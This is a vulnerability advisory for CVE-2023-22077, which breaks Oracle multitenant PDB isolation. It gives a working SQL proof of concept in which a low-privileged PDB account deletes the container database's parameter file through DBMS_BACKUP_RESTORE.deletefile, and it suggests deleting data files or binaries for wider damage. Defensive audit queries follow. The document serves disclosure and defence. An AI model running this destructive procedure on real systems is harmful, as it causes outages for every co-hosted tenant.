Title: CVE-2023-22077 – Denial of Service from PDB Level against Container Level (DoS) – breaking PDB Isolation
Product: Database
Vendor: Oracle
Affected Version(s): 19c,21c
Tested Version(s): 19c,21c
Fixed Versions: 19.21,21.12
Risk Level: Medium
Solution Status: Fixed
CVE Reference: CVE-2023-22077
Base Score: 4.9
Author of Advisory: Emad Al-Mousa

*****************************************
Vulnerability Details:

Isolation in multitenant cloud architecture is a challenging topic in cybersecurity. Over the last couple of years, security researchers have been able to break this isolation at multiple cloud vendors, with severe impact, so it remains an active and challenging area of cybersecurity.

The following vulnerability PoC illustrates that even though the "Lockdown Profile" security feature was in place to restrict OS accessibility, an attacker is still able to cause a denial of service that can impact ALL customers co-hosted within the same container database instance.

*****************************************
Proof of Concept (PoC):

From CDB$ROOT level I will create a lockdown profile to restrict any OS_ACCESS activity:

SQL> create lockdown profile OS_ACC;
SQL> select * from DBA_LOCKDOWN_PROFILES;
SQL> ALTER LOCKDOWN PROFILE OS_ACC DISABLE FEATURE= ('OS_ACCESS');

I will enable the lockdown profile on pluggable database ORCLPDB1, as SYS user:

SQL> alter session set container=ORCLPDB1;
SQL> show parameter pdb_lockdown
SQL> alter system set pdb_lockdown=OS_ACC;
SQL> startup force;

// side remark: to disable lockdown profile on PDB level
SQL> alter system set pdb_lockdown='';

At pluggable database ORCLPDB1 I will create an account called John with connect, create any procedure, execute any procedure, and create any directory, to try performing a DoS attack weaponizing the UTL_FILE package:

sqlplus / as sysdba
SQL> alter session set container=ORCLPDB1;
SQL> create user john identified by john_123;
User created.
SQL> grant connect,create any procedure,create any directory,execute any procedure to john;
Grant succeeded.

I will now connect to ORCLPDB1 using account john:

sqlplus "john/john_123"@ORCLPDB1
SQL> show user
USER is "JOHN"
SQL> select SYS_CONTEXT ('USERENV','ORACLE_HOME') from dual;

SYS_CONTEXT('USERENV','ORACLE_HOME')
--------------------------------------------------------------------------------
/opt/oracle/product/19c/dbhome_1

SQL> create or replace directory RAMBO as '/opt/oracle/product/19c/dbhome_1/dbs/';
SQL> grant read,write on directory RAMBO to WMSYS;
grant read,write on directory RAMBO to WMSYS
*
ERROR at line 1:
ORA-01031: insufficient privileges

** At this stage I can't continue further: as expected, the lockdown profile restricted me from any further exploitation weaponizing the utl_file package.

Trying a different approach with a different account and a different set of permissions, I will create account "tom" in pluggable database ORCLPDB1:

sqlplus / as sysdba
SQL> alter session set container=ORCLPDB1;
SQL> create user tom identified by tom_123;
User created.
SQL> grant connect,create any procedure,execute any procedure to tom;
Grant succeeded.

// connecting as tom against pluggable database ORCLPDB1
sqlplus "tom/tom_123"@ORCLPDB1
SQL> create or replace procedure sysbackup.dos is
begin
SYS.DBMS_BACKUP_RESTORE.deletefile('/opt/oracle/product/19c/dbhome_1/dbs/spfileORCLCDB.ora');
end;
/
Procedure created.
SQL> exec sysbackup.dos;

// Database will not start up, as the parameter file was deleted!

Of course, more extensive damage can happen, for example by deleting a system data file belonging to CDB$ROOT, deleting database binaries, or deleting control files, which means a complete and extended outage for all applications co-hosted within the container!
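
Audit queries for the conditions the PoC relies on, added here as an example and not part of the original advisory or of Oracle's guidance. They assume a session inside each PDB with SELECT access to the DBA_ views and V$INSTANCE; the second query assumes the code references SYS.DBMS_BACKUP_RESTORE directly, as the PoC procedure does.

```sql
-- Added example: run inside each PDB (ALTER SESSION SET CONTAINER=<pdb>).

-- 1) Grantees that hold BOTH system privileges given to the PoC account "tom".
--    Only grants recorded against the grantee itself are listed; privileges a
--    user inherits through a role show up under the role name, so review
--    DBA_ROLE_PRIVS for the members of any role returned here.
SELECT p.grantee,
       LISTAGG(p.privilege, ', ') WITHIN GROUP (ORDER BY p.privilege) AS privileges
FROM   dba_sys_privs p
WHERE  p.privilege IN ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE')
AND    p.grantee NOT IN (SELECT username FROM dba_users
                         WHERE  oracle_maintained = 'Y')
AND    p.grantee NOT IN (SELECT role FROM dba_roles
                         WHERE  oracle_maintained = 'Y')
GROUP  BY p.grantee
HAVING COUNT(DISTINCT p.privilege) = 2;

-- 2) Stored code outside SYS that depends on SYS.DBMS_BACKUP_RESTORE.
--    The PoC procedure lives in the Oracle-maintained SYSBACKUP schema, so
--    Oracle-maintained owners are deliberately NOT filtered out; use CREATED
--    and LAST_DDL_TIME to separate shipped objects from recently added ones.
SELECT d.owner,
       d.name,
       d.type,
       o.created,
       o.last_ddl_time,
       o.status
FROM   dba_dependencies d
JOIN   dba_objects o
       ON  o.owner       = d.owner
       AND o.object_name = d.name
       AND o.object_type = d.type
WHERE  d.referenced_owner = 'SYS'
AND    d.referenced_name  = 'DBMS_BACKUP_RESTORE'
AND    d.owner <> 'SYS'
ORDER  BY o.created DESC;

-- 3) Release update level, to compare against the fixed versions listed in
--    this advisory (19.21, 21.12).
SELECT instance_name, version_full
FROM   v$instance;
```

Any row from the first query identifies an account or role with the same privilege pair as "tom"; any unexpected row from the second warrants a look at the object's source in DBA_SOURCE.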
*****************************************
References:

https://databasesecurityninja.wordpress.com/2025/08/04/cve-2023-22077-denial-of-service-from-pdb-level-against-container-level-dos-breaking-pdb-isolation/
https://github.com/emad-almousa/CVE-2023-22077
https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/cve-2023-22077